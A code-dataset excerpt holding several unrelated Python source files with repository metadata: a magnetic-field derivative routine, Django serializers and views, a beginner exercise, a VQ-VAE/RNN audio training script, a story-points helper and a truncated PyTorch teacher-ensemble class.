- ((fxyzi + fxyzj)/f02 + 2.) * B0z2
+ 0.5*f02 * (3.*B2dB + B30dz/B10dz)
+((x-xi)*(x-xj) + (y-yi)*(y-yj)) * ((
1. + (fxyzi + fxyzj)/f02) * B10dz2 + BB20dz - B0z4/f02)
) + Bbz*Si*G0i/(mu0*g0) * (B30dz/B0z*f02 - 2*(fxyzi/f02 + 1) *
BB10dz + (4*fxyzi**2/f02 - 2*fxyzi + 2*f02) * B10dz2*B10dz/B0z3
+ (6*fxyzi - 3*f02) * B10dz*B20dz/B0z2
) + Bbz*Sj*G0j/(mu0*g0) * (B30dz/B0z*f02 - 2*(fxyzj/f02 + 1) *
BB10dz + (4*fxyzj**2/f02 - 2*fxyzj + 2*f02) * B10dz2*B10dz/B0z3
+ (6*fxyzj - 3*f02) * B10dz*B20dz/B0z2
)
Fx = - 2*Si*Sj/mu0 * G0ij*BB10dz2/f02 * (
(x-xi) * fxyzi + (x-xj) * fxyzj )
Fy = - 2*Si*Sj/mu0 * G0ij*BB10dz2/f02 * (
(y-yi) * fxyzi + (y-yj) * fxyzj )
#Define derivatives of Bx
dxiBx = - Si * (BB10dz * G0i) \
+ 2 * Si * (x-xi)**2 * B10dz * B0z3 * G0i/f02
dyiBx = 2 * Si * (x-xi) * (y-yi) * B10dz * B0z3 * G0i/f02
dziBx = - Si * (x-xi) * (B0z*B20dz + (1. + 2.*fxyzi/f02)*B10dz2)*G0i
dxjBx = - Sj * (BB10dz * G0j) \
+ 2 * Sj * (x-xj)**2 * B10dz * B0z3 * G0j/f02
dyjBx = 2 * Sj * (x-xj) * (y-yj) * B10dz * B0z3 * G0j/f02
dzjBx = - Sj * (x-xj) * (B0z*B20dz + (1. + 2.*fxyzj/f02)*B10dz2)*G0j
#Define derivatives By
dxiBy = - Si * (BB10dz * G0i) \
+ 2 * Si * (y-yi)**2 * B10dz * B0z3 * G0i/f02
dyiBy = 2 * Si * (x-xi) * (y-yi) * B10dz * B0z3 * G0i/f02
dziBy = - Si * (y-yi) * (B0z*B20dz + (1. + 2.*fxyzi/f02)*B10dz2)*G0i
dxjBy = - Sj * (BB10dz * G0j) \
+ 2 * Sj * (y-yj)**2 * B10dz * B0z3 * G0j/f02
dyjBy = 2 * Sj * (x-xj) * (y-yj) * B10dz * B0z3 * G0j/f02
dzjBy = - Sj * (y-yj) * (B0z*B20dz + (1. + 2.*fxyzj/f02)*B10dz2)*G0j
B2x = (Bxi * dxjBx + Byi * dyjBx + Bzi * dzjBx
+ Bxj * dxiBx + Byj * dyiBx + Bzj * dziBx)/mu0
B2y = (Bxi * dxjBy + Byi * dyjBy + Bzi * dzjBy
+ Bxj * dxiBy + Byj * dyiBy + Bzj * dziBy)/mu0
return pbbal, rho_1, Fx, Fy, B2x, B2y
| 40.986726
| 83
| 0.45428
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 5,243
| 0.283008
|
5539d275ebd36d43b5d44642306d4d9d488a83a3
| 961
|
py
|
Python
|
s3_file_uploads/serializers.py
|
dabapps/django-s3-file-uploads
|
17ed6b4e02bd43bc925af987ff5bf971a82da434
|
[
"BSD-3-Clause"
] | 5
|
2019-05-27T03:51:30.000Z
|
2021-03-19T11:24:09.000Z
|
s3_file_uploads/serializers.py
|
dabapps/django-s3-file-uploads
|
17ed6b4e02bd43bc925af987ff5bf971a82da434
|
[
"BSD-3-Clause"
] | 7
|
2019-12-04T22:38:13.000Z
|
2021-06-10T17:50:06.000Z
|
s3_file_uploads/serializers.py
|
dabapps/django-s3-file-uploads
|
17ed6b4e02bd43bc925af987ff5bf971a82da434
|
[
"BSD-3-Clause"
] | null | null | null |
from rest_framework import serializers
from s3_file_uploads.constants import ACCESS_CONTROL_TYPES, PRIVATE
from s3_file_uploads.models import UploadedFile
class UploadedFileSerializer(serializers.ModelSerializer):
file_name = serializers.CharField(source='file.name', read_only=True)
file = serializers.URLField(source='get_download_url', read_only=True)
class Meta:
model = UploadedFile
fields = [
'id',
'created',
'modified',
'file_key',
'file',
'filename',
'file_name',
'file_path',
'user',
]
read_only_fields = [
'id',
'modified',
'created',
'file_name',
'file_path',
'file_key'
]
class AccessControlListSerializer(serializers.Serializer):
acl = serializers.ChoiceField(choices=ACCESS_CONTROL_TYPES, default=PRIVATE)
| 27.457143
| 80
| 0.597294
| 801
| 0.833507
| 0
| 0
| 0
| 0
| 0
| 0
| 160
| 0.166493
|
553a35ee3c9965503e444537543d6f056c2747c7
| 1,873
|
py
|
Python
|
vbts_webadmin/views/subscribers.py
|
pcarivbts/vbts-webadmin
|
0616eca6492daa3ebc26b442e8dbebda7ac06d51
|
[
"BSD-3-Clause"
] | null | null | null |
vbts_webadmin/views/subscribers.py
|
pcarivbts/vbts-webadmin
|
0616eca6492daa3ebc26b442e8dbebda7ac06d51
|
[
"BSD-3-Clause"
] | 3
|
2020-06-05T18:34:16.000Z
|
2021-06-10T20:31:18.000Z
|
vbts_webadmin/views/subscribers.py
|
pcarivbts/vbts-webadmin
|
0616eca6492daa3ebc26b442e8dbebda7ac06d51
|
[
"BSD-3-Clause"
] | 2
|
2018-07-04T00:54:50.000Z
|
2022-01-28T16:52:10.000Z
|
"""
Copyright (c) 2015-present, Philippine-California Advanced Research Institutes-
The Village Base Station Project (PCARI-VBTS). All rights reserved.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
"""
from django.contrib import messages as alerts
from django.contrib.auth.decorators import login_required
from django.core.paginator import Paginator
from django.core.paginator import EmptyPage
from django.core.paginator import PageNotAnInteger
from django.db.models import Q
from django.shortcuts import render
from django.utils.translation import ugettext as _
from vbts_subscribers.models import SipBuddies
from vbts_webadmin.forms import SearchForm
@login_required
def subscribers_list(request, template_name='subscribers/list.html'):
data = {}
if 'search' in request.GET:
subscribers = SipBuddies.objects.all()
for term in request.GET['search'].split():
subscribers = subscribers.filter(Q(name__icontains=term) |
Q(callerid__icontains=term))
data['search'] = True
alerts.info(request,
_("You've searched for: '%s'") % request.GET['search'])
else:
subscribers = SipBuddies.objects.all()
paginator = Paginator(subscribers, 15)
page = request.GET.get('page')
is_paginated = False
if paginator.num_pages > 1:
is_paginated = True
try:
subscribers = paginator.page(page)
except PageNotAnInteger:
subscribers = paginator.page(1)
except EmptyPage:
subscribers = paginator.page(paginator.num_pages)
form = SearchForm(form_action='subscribers')
data['subscribers'] = subscribers
data['is_paginated'] = is_paginated
data['form'] = form
return render(request, template_name, data)
| 33.446429
| 79
| 0.705286
| 0
| 0
| 0
| 0
| 1,134
| 0.605446
| 0
| 0
| 416
| 0.222104
|
553df305accc95bd90095dbb25295bf9604e38ba
| 268
|
py
|
Python
|
Aula 05/[Exercicio 01] .py
|
IsaacPSilva/LetsCode
|
64396ee9fd0ad395598c74c3727a614261e5dd50
|
[
"MIT"
] | null | null | null |
Aula 05/[Exercicio 01] .py
|
IsaacPSilva/LetsCode
|
64396ee9fd0ad395598c74c3727a614261e5dd50
|
[
"MIT"
] | null | null | null |
Aula 05/[Exercicio 01] .py
|
IsaacPSilva/LetsCode
|
64396ee9fd0ad395598c74c3727a614261e5dd50
|
[
"MIT"
] | null | null | null |
'''1. Write a program that asks the user to type a word and
prints each letter on its own line.'''
# Ask the user for the word to be processed
frase = input('Digite uma palavra: ')
# Iterate over the letters of the word and print each one
for letra in frase:
print(letra)
| 29.777778
| 68
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 213
| 0.788889
|
553e5975ce3bca9dd2037d832b61d89b76e372a6
| 16,307
|
py
|
Python
|
examples/vq_rnn_fruit_joint/vq_fruit_joint.py
|
kastnerkyle/tfbldr
|
58ad1437d500924acd15d1c6eec4a864f57e9c7c
|
[
"BSD-3-Clause"
] | 4
|
2018-05-15T22:35:00.000Z
|
2019-02-22T01:40:49.000Z
|
examples/vq_rnn_fruit_joint/vq_fruit_joint.py
|
kastnerkyle/tfbldr
|
58ad1437d500924acd15d1c6eec4a864f57e9c7c
|
[
"BSD-3-Clause"
] | null | null | null |
examples/vq_rnn_fruit_joint/vq_fruit_joint.py
|
kastnerkyle/tfbldr
|
58ad1437d500924acd15d1c6eec4a864f57e9c7c
|
[
"BSD-3-Clause"
] | 2
|
2018-06-09T15:08:44.000Z
|
2018-11-20T10:13:48.000Z
|
from tfbldr.nodes import Conv2d
from tfbldr.nodes import ConvTranspose2d
from tfbldr.nodes import VqEmbedding
from tfbldr.nodes import BatchNorm2d
from tfbldr.nodes import Linear
from tfbldr.nodes import ReLU
from tfbldr.nodes import Sigmoid
from tfbldr.nodes import Tanh
from tfbldr.nodes import OneHot
from tfbldr.nodes import Softmax
from tfbldr.nodes import LSTMCell
from tfbldr.nodes import CategoricalCrossEntropyIndexCost
from tfbldr.nodes import CategoricalCrossEntropyLinearIndexCost
from tfbldr.nodes import BernoulliCrossEntropyCost
from tfbldr.datasets import ordered_list_iterator
from tfbldr.plot import get_viridis
from tfbldr.plot import autoaspect
from tfbldr.datasets import fetch_fruitspeech
from tfbldr import get_params_dict
from tfbldr import run_loop
from tfbldr import scan
import tensorflow as tf
import numpy as np
from collections import namedtuple, defaultdict
import itertools
viridis_cm = get_viridis()
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
fruit = fetch_fruitspeech()
minmin = np.inf
maxmax = -np.inf
for s in fruit["data"]:
si = s - s.mean()
minmin = min(minmin, si.min())
maxmax = max(maxmax, si.max())
train_data = []
valid_data = []
type_counts = defaultdict(lambda: 0)
final_audio = []
for n, s in enumerate(fruit["data"]):
type_counts[fruit["target"][n]] += 1
s = s - s.mean()
n_s = (s - minmin) / float(maxmax - minmin)
n_s = 2 * n_s - 1
#n_s = mu_law_transform(n_s, 256)
if type_counts[fruit["target"][n]] == 15:
valid_data.append(n_s)
else:
train_data.append(n_s)
def _cuts(list_of_audio, cut, step):
# make many overlapping cuts
# 8k, this means offset is ~4ms @ step of 32
real_final = []
real_idx = []
for n, s in enumerate(list_of_audio):
# cut off the end
s = s[:len(s) - len(s) % step]
starts = np.arange(0, len(s) - cut + step, step)
for st in starts:
real_final.append(s[st:st + cut][None, :, None])
real_idx.append(n)
return real_final, real_idx
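# Worked example (added for illustration only): with cut=256 and step=1, an
# audio clip of length 1000 yields starts 0..744, i.e. 745 overlapping windows,
# each returned with shape (1, 256, 1); real_idx records which clip each
# window came from.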
cut = 256
step = 1
train_audio, train_audio_idx = _cuts(train_data, cut, step)
valid_audio, valid_audio_idx = _cuts(valid_data, cut, step)
random_state = np.random.RandomState(1999)
l1_dim = (64, 1, 4, [1, 1, 2, 1])
l2_dim = (128, 1, 4, [1, 1, 2, 1])
l3_dim = (256, 1, 4, [1, 1, 2, 1])
l3_dim = (257, 1, 4, [1, 1, 2, 1])
l4_dim = (256, 1, 4, [1, 1, 2, 1])
l5_dim = (257, 1, 1, [1, 1, 1, 1])
embedding_dim = 512
vqvae_batch_size = 50
rnn_batch_size = 50
n_hid = 512
n_clusters = 64
# goes from 256 -> 16
hardcoded_z_len = 16
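# (Added note: with cut = 256 and four stride-2 convolutions along the length
# axis in the encoder, the latent sequence length is 256 / 2**4 = 16, which is
# where hardcoded_z_len comes from.)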
# reserve 0 for "start code"
n_inputs = embedding_dim + 1
switch_step = 10000
both = True
# reserve 0 for start code
rnn_init = "truncated_normal"
forward_init = "truncated_normal"
l_dims = [l1_dim, l2_dim, l3_dim, l4_dim, l5_dim]
stride_div = np.prod([ld[-1] for ld in l_dims])
ebpad = [0, 0, 4 // 2 - 1, 0]
dbpad = [0, 0, 4 // 2 - 1, 0]
train_itr_random_state = np.random.RandomState(1122)
valid_itr_random_state = np.random.RandomState(12)
train_itr = ordered_list_iterator([train_audio], train_audio_idx, vqvae_batch_size, random_state=train_itr_random_state)
valid_itr = ordered_list_iterator([valid_audio], valid_audio_idx, vqvae_batch_size, random_state=valid_itr_random_state)
"""
for i in range(10000):
tt = train_itr.next_batch()
# tt[0][3][:, :16] == tt[0][2][:, 16:32]
"""
def create_encoder(inp, bn_flag):
l1 = Conv2d([inp], [1], l_dims[0][0], kernel_size=l_dims[0][1:3], name="enc1",
strides=l_dims[0][-1],
border_mode=ebpad,
random_state=random_state)
bn_l1 = BatchNorm2d(l1, bn_flag, name="bn_enc1")
r_l1 = ReLU(bn_l1)
l2 = Conv2d([r_l1], [l_dims[0][0]], l_dims[1][0], kernel_size=l_dims[1][1:3], name="enc2",
strides=l_dims[1][-1],
border_mode=ebpad,
random_state=random_state)
bn_l2 = BatchNorm2d(l2, bn_flag, name="bn_enc2")
r_l2 = ReLU(bn_l2)
l3 = Conv2d([r_l2], [l_dims[1][0]], l_dims[2][0], kernel_size=l_dims[2][1:3], name="enc3",
strides=l_dims[2][-1],
border_mode=ebpad,
random_state=random_state)
bn_l3 = BatchNorm2d(l3, bn_flag, name="bn_enc3")
r_l3 = ReLU(bn_l3)
l4 = Conv2d([r_l3], [l_dims[2][0]], l_dims[3][0], kernel_size=l_dims[3][1:3], name="enc4",
strides=l_dims[3][-1],
border_mode=ebpad,
random_state=random_state)
bn_l4 = BatchNorm2d(l4, bn_flag, name="bn_enc4")
r_l4 = ReLU(bn_l4)
l5 = Conv2d([r_l4], [l_dims[3][0]], l_dims[4][0], kernel_size=l_dims[4][1:3], name="enc5",
random_state=random_state)
bn_l5 = BatchNorm2d(l5, bn_flag, name="bn_enc5")
return bn_l5
def create_decoder(latent, bn_flag):
l1 = Conv2d([latent], [l_dims[-1][0]], l_dims[-2][0], kernel_size=l_dims[-1][1:3], name="dec1",
random_state=random_state)
bn_l1 = BatchNorm2d(l1, bn_flag, name="bn_dec1")
r_l1 = ReLU(bn_l1)
l2 = ConvTranspose2d([r_l1], [l_dims[-2][0]], l_dims[-3][0], kernel_size=l_dims[-2][1:3], name="dec2",
strides=l_dims[-2][-1],
border_mode=dbpad,
random_state=random_state)
bn_l2 = BatchNorm2d(l2, bn_flag, name="bn_dec2")
r_l2 = ReLU(bn_l2)
l3 = ConvTranspose2d([r_l2], [l_dims[-3][0]], l_dims[-4][0], kernel_size=l_dims[-3][1:3], name="dec3",
strides=l_dims[-3][-1],
border_mode=dbpad,
random_state=random_state)
bn_l3 = BatchNorm2d(l3, bn_flag, name="bn_dec3")
r_l3 = ReLU(bn_l3)
l4 = ConvTranspose2d([r_l3], [l_dims[-4][0]], l_dims[-5][0], kernel_size=l_dims[-4][1:3], name="dec4",
strides=l_dims[-4][-1],
border_mode=dbpad,
random_state=random_state)
bn_l4 = BatchNorm2d(l4, bn_flag, name="bn_dec4")
r_l4 = ReLU(bn_l4)
l5 = ConvTranspose2d([r_l4], [l_dims[-5][0]], 1, kernel_size=l_dims[-5][1:3], name="dec5",
strides=l_dims[-5][-1],
border_mode=dbpad,
random_state=random_state)
#s_l5 = Sigmoid(l5)
t_l5 = Tanh(l5)
return t_l5
def create_vqvae(inp, bn):
z_e_x = create_encoder(inp, bn)
z_q_x, z_i_x, z_nst_q_x, emb = VqEmbedding(z_e_x, l_dims[-1][0], embedding_dim, random_state=random_state, name="embed")
x_tilde = create_decoder(z_q_x, bn)
return x_tilde, z_e_x, z_q_x, z_i_x, z_nst_q_x, emb
def create_vqrnn(inp_tm1, inp_t, h1_init, c1_init, h1_q_init, c1_q_init):
oh_tm1 = OneHot(inp_tm1, n_inputs)
p_tm1 = Linear([oh_tm1], [n_inputs], n_hid, random_state=random_state, name="proj",
init=forward_init)
def step(x_t, h1_tm1, c1_tm1, h1_q_tm1, c1_q_tm1):
output, s = LSTMCell([x_t], [n_hid], h1_tm1, c1_tm1, n_hid,
random_state=random_state,
name="rnn1", init=rnn_init)
h1_t = s[0]
c1_t = s[1]
output, s = LSTMCell([h1_t], [n_hid], h1_q_tm1, c1_q_tm1, n_hid,
random_state=random_state,
name="rnn1_q", init=rnn_init)
h1_cq_t = s[0]
c1_q_t = s[1]
h1_q_t, h1_i_t, h1_nst_q_t, h1_emb = VqEmbedding(h1_cq_t, n_hid, n_clusters,
random_state=random_state,
name="h1_vq_emb")
# not great
h1_i_t = tf.cast(h1_i_t, tf.float32)
return output, h1_t, c1_t, h1_q_t, c1_q_t, h1_nst_q_t, h1_cq_t, h1_i_t
r = scan(step, [p_tm1], [None, h1_init, c1_init, h1_q_init, c1_q_init, None, None, None])
out = r[0]
hiddens = r[1]
cells = r[2]
q_hiddens = r[3]
q_cells = r[4]
q_nst_hiddens = r[5]
q_nvq_hiddens = r[6]
i_hiddens = r[7]
pred = Linear([out], [n_hid], n_inputs, random_state=random_state, name="out",
init=forward_init)
pred_sm = Softmax(pred)
return pred_sm, pred, hiddens, cells, q_hiddens, q_cells, q_nst_hiddens, q_nvq_hiddens, i_hiddens, oh_tm1
def create_graph():
graph = tf.Graph()
with graph.as_default():
# vqvae part
# define all the vqvae inputs and outputs
vqvae_inputs = tf.placeholder(tf.float32, shape=[None, train_audio[0].shape[0],
train_audio[0].shape[1],
train_audio[0].shape[2]])
bn_flag = tf.placeholder_with_default(tf.zeros(shape=[]), shape=[])
x_tilde, z_e_x, z_q_x, z_i_x, z_nst_q_x, z_emb = create_vqvae(vqvae_inputs, bn_flag)
#rec_loss = tf.reduce_mean(BernoulliCrossEntropyCost(x_tilde, images))
vqvae_rec_loss = tf.reduce_mean(tf.square(x_tilde - vqvae_inputs))
vqvae_vq_loss = tf.reduce_mean(tf.square(tf.stop_gradient(z_e_x) - z_nst_q_x))
vqvae_commit_loss = tf.reduce_mean(tf.square(z_e_x - tf.stop_gradient(z_nst_q_x)))
vqvae_alpha = 1.
vqvae_beta = 0.25
vqvae_loss = vqvae_rec_loss + vqvae_alpha * vqvae_vq_loss + vqvae_beta * vqvae_commit_loss
vqvae_params = get_params_dict()
# get vqvae keys now, dict is *dynamic* and shared
vqvae_params_keys = [k for k in vqvae_params.keys()]
vqvae_grads = tf.gradients(vqvae_loss, vqvae_params.values())
learning_rate = 0.0002
vqvae_optimizer = tf.train.AdamOptimizer(learning_rate, use_locking=True)
assert len(vqvae_grads) == len(vqvae_params)
j = [(g, p) for g, p in zip(vqvae_grads, vqvae_params.values())]
vqvae_train_step = vqvae_optimizer.apply_gradients(j)
# rnn part
# ultimately we will use 2 calls to feed_dict to make lookup mappings easier, but could do it like this
#rnn_inputs = tf.cast(tf.stop_gradient(tf.transpose(z_i_x, (2, 0, 1))), tf.float32)
rnn_inputs = tf.placeholder(tf.float32, shape=[None, rnn_batch_size, 1])
rnn_inputs_tm1 = rnn_inputs[:-1]
rnn_inputs_t = rnn_inputs[1:]
init_hidden = tf.placeholder(tf.float32, shape=[rnn_batch_size, n_hid])
init_cell = tf.placeholder(tf.float32, shape=[rnn_batch_size, n_hid])
init_q_hidden = tf.placeholder(tf.float32, shape=[rnn_batch_size, n_hid])
init_q_cell = tf.placeholder(tf.float32, shape=[rnn_batch_size, n_hid])
r = create_vqrnn(rnn_inputs_tm1, rnn_inputs_t, init_hidden, init_cell, init_q_hidden, init_q_cell)
pred_sm, pred, hiddens, cells, q_hiddens, q_cells, q_nst_hiddens, q_nvq_hiddens, i_hiddens, oh_tm1 = r
rnn_rec_loss = tf.reduce_mean(CategoricalCrossEntropyIndexCost(pred_sm, rnn_inputs_t))
#rnn_rec_loss = tf.reduce_mean(CategoricalCrossEntropyLinearIndexCost(pred, rnn_inputs_t))
rnn_alpha = 1.
rnn_beta = 0.25
rnn_vq_h_loss = tf.reduce_mean(tf.square(tf.stop_gradient(q_nvq_hiddens) - q_nst_hiddens))
rnn_commit_h_loss = tf.reduce_mean(tf.square(q_nvq_hiddens - tf.stop_gradient(q_nst_hiddens)))
rnn_loss = rnn_rec_loss + rnn_alpha * rnn_vq_h_loss + rnn_beta * rnn_commit_h_loss
rnn_params = {k:v for k, v in get_params_dict().items() if k not in vqvae_params_keys}
rnn_grads = tf.gradients(rnn_loss, rnn_params.values())
learning_rate = 0.0001
rnn_optimizer = tf.train.AdamOptimizer(learning_rate, use_locking=True)
assert len(rnn_grads) == len(rnn_params)
rnn_grads = [tf.clip_by_value(g, -10., 10.) if g is not None else None for g in rnn_grads]
j = [(g, p) for g, p in zip(rnn_grads, rnn_params.values())]
rnn_train_step = rnn_optimizer.apply_gradients(j)
things_names = ["vqvae_inputs",
"bn_flag",
"x_tilde",
"z_e_x",
"z_q_x",
"z_i_x",
"z_emb",
"vqvae_loss",
"vqvae_rec_loss",
"vqvae_train_step",
"rnn_inputs",
"rnn_inputs_tm1",
"rnn_inputs_t",
"init_hidden",
"init_cell",
"init_q_hidden",
"init_q_cell",
"hiddens",
"cells",
"q_hiddens",
"q_cells",
"q_nvq_hiddens",
"i_hiddens",
"pred",
"pred_sm",
"oh_tm1",
"rnn_loss",
"rnn_rec_loss",
"rnn_train_step"]
things_tf = [eval(name) for name in things_names]
for tn, tt in zip(things_names, things_tf):
graph.add_to_collection(tn, tt)
train_model = namedtuple('Model', things_names)(*things_tf)
return graph, train_model
g, vs = create_graph()
rnn_train = False
step = 0
def loop(sess, itr, extras, stateful_args):
x, = itr.next_batch()
init_h = np.zeros((rnn_batch_size, n_hid)).astype("float32")
init_c = np.zeros((rnn_batch_size, n_hid)).astype("float32")
init_q_h = np.zeros((rnn_batch_size, n_hid)).astype("float32")
init_q_c = np.zeros((rnn_batch_size, n_hid)).astype("float32")
global rnn_train
global step
if extras["train"]:
step += 1
if step > switch_step:
rnn_train = True
if both or not rnn_train:
feed = {vs.vqvae_inputs: x,
vs.bn_flag: 0.}
outs = [vs.vqvae_rec_loss, vs.vqvae_loss, vs.vqvae_train_step, vs.z_i_x]
r = sess.run(outs, feed_dict=feed)
vqvae_l = r[0]
vqvae_t_l = r[1]
vqvae_step = r[2]
if rnn_train:
feed = {vs.vqvae_inputs: x,
vs.bn_flag: 1.}
outs = [vs.vqvae_rec_loss, vs.z_i_x]
r = sess.run(outs, feed_dict=feed)
vqvae_l = r[0]
vqvae_t_l = r[1]
discrete_z = r[-1]
#discrete_z[3][:, 2:-2] == discrete_z[4][:, 1:-3]
#discrete_z = discrete_z[:, :, 1:-2]
shp = discrete_z.shape
# always start with 0
rnn_inputs = np.zeros((shp[2] + 1, shp[0], shp[1]))
rnn_inputs[1:] = discrete_z.transpose(2, 0, 1) + 1.
if both or rnn_train:
feed = {vs.rnn_inputs: rnn_inputs,
vs.init_hidden: init_h,
vs.init_cell: init_c,
vs.init_q_hidden: init_q_h,
vs.init_q_cell: init_q_c}
outs = [vs.rnn_rec_loss, vs.rnn_loss, vs.rnn_train_step]
r = sess.run(outs, feed_dict=feed)
rnn_l = r[0]
rnn_t_l = r[1]
rnn_step = r[2]
if not rnn_train:
feed = {vs.rnn_inputs: rnn_inputs,
vs.init_hidden: init_h,
vs.init_cell: init_c,
vs.init_q_hidden: init_q_h,
vs.init_q_cell: init_q_c}
outs = [vs.rnn_rec_loss]
r = sess.run(outs, feed_dict=feed)
rnn_l = r[0]
else:
feed = {vs.vqvae_inputs: x,
vs.bn_flag: 1.}
outs = [vs.vqvae_rec_loss, vs.z_i_x]
r = sess.run(outs, feed_dict=feed)
vqvae_l = r[0]
discrete_z = r[-1]
#discrete_z = discrete_z[:, :, 1:-2]
shp = discrete_z.shape
# always start with 0
rnn_inputs = np.zeros((shp[2] + 1, shp[0], shp[1]))
rnn_inputs[1:] = discrete_z.transpose(2, 0, 1) + 1.
feed = {vs.rnn_inputs: rnn_inputs,
vs.init_hidden: init_h,
vs.init_cell: init_c,
vs.init_q_hidden: init_q_h,
vs.init_q_cell: init_q_c}
outs = [vs.rnn_rec_loss]
r = sess.run(outs, feed_dict=feed)
rnn_l = r[0]
return [vqvae_l, rnn_l], None, stateful_args
with tf.Session(graph=g) as sess:
run_loop(sess,
loop, train_itr,
loop, valid_itr,
n_steps=75000,
n_train_steps_per=5000,
n_valid_steps_per=500)
| 38.189696
| 124
| 0.592506
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,584
| 0.097136
|
553eb4733f79df133de3656ed4a77eb050d859d2
| 311
|
py
|
Python
|
scripts/poorscrum/poorscrum_tools.py
|
r09491/poorscrum
|
cdbbc0db03fde842f546093f46e70d03a105bbbd
|
[
"MIT"
] | null | null | null |
scripts/poorscrum/poorscrum_tools.py
|
r09491/poorscrum
|
cdbbc0db03fde842f546093f46e70d03a105bbbd
|
[
"MIT"
] | 7
|
2021-03-18T22:37:46.000Z
|
2022-03-11T23:41:39.000Z
|
scripts/poorscrum/poorscrum_tools.py
|
r09491/poorscrum
|
cdbbc0db03fde842f546093f46e70d03a105bbbd
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
def fibonacci(n):
if n == 0:
return 0
elif n == 1:
return 1
else:
return fibonacci(n-1) + fibonacci(n-2)
def story_points(start):
for i in range(10):
result = fibonacci(i)
if result >= start:
break
return result
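# Illustrative examples (added, not in the original file): story_points(5) -> 5
# and story_points(6) -> 8, i.e. an estimate is rounded up to the smallest
# Fibonacci number that is at least as large, a common scrum sizing convention.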
| 17.277778
| 46
| 0.508039
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 23
| 0.073955
|
554005d26d7a3413df01a385a87bf09337208562
| 6,162
|
py
|
Python
|
cata/teachers/ensembles/both_rotation_ensemble.py
|
seblee97/student_teacher_catastrophic
|
9baaaf2850025ba9cf33d61c42386bc4c3b2dad2
|
[
"MIT"
] | 2
|
2021-09-13T01:44:09.000Z
|
2021-12-11T11:56:49.000Z
|
cata/teachers/ensembles/both_rotation_ensemble.py
|
seblee97/student_teacher_catastrophic
|
9baaaf2850025ba9cf33d61c42386bc4c3b2dad2
|
[
"MIT"
] | 8
|
2020-11-13T18:37:30.000Z
|
2022-02-15T15:11:51.000Z
|
cata/teachers/ensembles/both_rotation_ensemble.py
|
seblee97/student_teacher_catastrophic
|
9baaaf2850025ba9cf33d61c42386bc4c3b2dad2
|
[
"MIT"
] | null | null | null |
from typing import List
from typing import Union
import numpy as np
import torch
from cata.teachers.ensembles import base_teacher_ensemble
from cata.utils import custom_functions
class BothRotationTeacherEnsemble(base_teacher_ensemble.BaseTeacherEnsemble):
"""Teacher ensemble (primarily for mean-field limit regime) in which both feature and
readout similarities are tuned by rotation.
"""
def __init__(
self,
input_dimension: int,
hidden_dimensions: List[int],
output_dimension: int,
bias: bool,
loss_type: str,
nonlinearities: str,
scale_hidden_lr: bool,
forward_scaling: float,
unit_norm_teacher_head: bool,
weight_normalisation: bool,
noise_stds: Union[int, float],
num_teachers: int,
initialisation_std: float,
feature_rotation_alpha: float,
readout_rotation_alpha: float,
):
self._feature_rotation_alpha = feature_rotation_alpha
self._readout_rotation_alpha = readout_rotation_alpha
super().__init__(
input_dimension=input_dimension,
hidden_dimensions=hidden_dimensions,
output_dimension=output_dimension,
bias=bias,
loss_type=loss_type,
nonlinearities=nonlinearities,
scale_hidden_lr=scale_hidden_lr,
forward_scaling=forward_scaling,
unit_norm_teacher_head=unit_norm_teacher_head,
weight_normalisation=weight_normalisation,
noise_stds=noise_stds,
num_teachers=num_teachers,
initialisation_std=initialisation_std,
)
def _setup_teachers(self) -> None:
"""Setup teachers with copies across input to hidden and rotations
across hidden to output weights.
Raises:
AssertionError: If more than 2 teachers are requested.
AssertionError: If the network depth is greater than 1,
i.e. more than one hidden layer requested.
AssertionError: If the hidden dimension is not greater than 1,
this is for the notion of rotation to have meaning.
"""
assert (
self._num_teachers
) == 2, "Both rotation teachers currently implemented for 2 teachers only."
assert (
len(self._hidden_dimensions) == 1
), "Both rotation teachers currently implemented for 1 hidden layer only."
assert (
self._hidden_dimensions[0] > 1
), "Both rotation teachers only valid for hidden dimensions > 1."
teachers = [
self._init_teacher(
nonlinearity=self._nonlinearities[i], noise_std=self._noise_stds[i]
)
for i in range(self._num_teachers)
]
with torch.no_grad():
(
teacher_0_feature_weights,
teacher_1_feature_weights,
) = self._get_rotated_weights(
unrotated_weights=teachers[0].layers[0].weight.data.T,
alpha=self._feature_rotation_alpha,
normalisation=self._hidden_dimensions[0],
)
teachers[0].layers[0].weight.data = teacher_0_feature_weights.T
teachers[1].layers[0].weight.data = teacher_1_feature_weights.T
# (
# teacher_0_readout_weights,
# teacher_1_readout_weights,
# ) = self._get_rotated_weights(
# unrotated_weights=teachers[0].head.weight.data.T,
# alpha=self._readout_rotation_alpha,
# normalisation=None,
# )
(
teacher_0_readout_weights,
teacher_1_readout_weights,
) = self._get_rotated_readout_weights(teachers=teachers)
teachers[0].head.weight.data = teacher_0_readout_weights
teachers[1].head.weight.data = teacher_1_readout_weights
return teachers
def _feature_overlap(self, feature_1: torch.Tensor, feature_2: torch.Tensor):
alpha_matrix = torch.mm(feature_1, feature_2.T) / self._hidden_dimensions[0]
alpha = torch.mean(alpha_matrix.diagonal())
return alpha
def _readout_overlap(self, feature_1: torch.Tensor, feature_2: torch.Tensor):
alpha = torch.mm(feature_1, feature_2.T) / (
torch.norm(feature_1) * torch.norm(feature_2)
)
return alpha
def _get_rotated_weights(
self,
unrotated_weights: torch.Tensor,
alpha: float,
normalisation: Union[None, int],
):
if normalisation is not None:
# orthonormalise input to hidden weights of first teacher
self_overlap = (
torch.mm(unrotated_weights, unrotated_weights.T) / normalisation
)
L = torch.cholesky(self_overlap)
orthonormal_weights = torch.mm(torch.inverse(L), unrotated_weights)
else:
orthonormal_weights = unrotated_weights
# construct input to hidden weights of second teacher
second_teacher_rotated_weights = alpha * orthonormal_weights + np.sqrt(
1 - alpha ** 2
) * torch.randn(orthonormal_weights.shape)
return orthonormal_weights, second_teacher_rotated_weights
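# Added commentary (not in the original source): because the rows of
# `orthonormal_weights` are normalised and the Gaussian noise term is
# independent of them, mixing W2 = alpha * W1 + sqrt(1 - alpha**2) * noise
# gives corresponding rows of W1 and W2 an expected overlap of alpha, which is
# how the feature similarity between the two teachers is tuned.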
def _get_rotated_readout_weights(self, teachers: List):
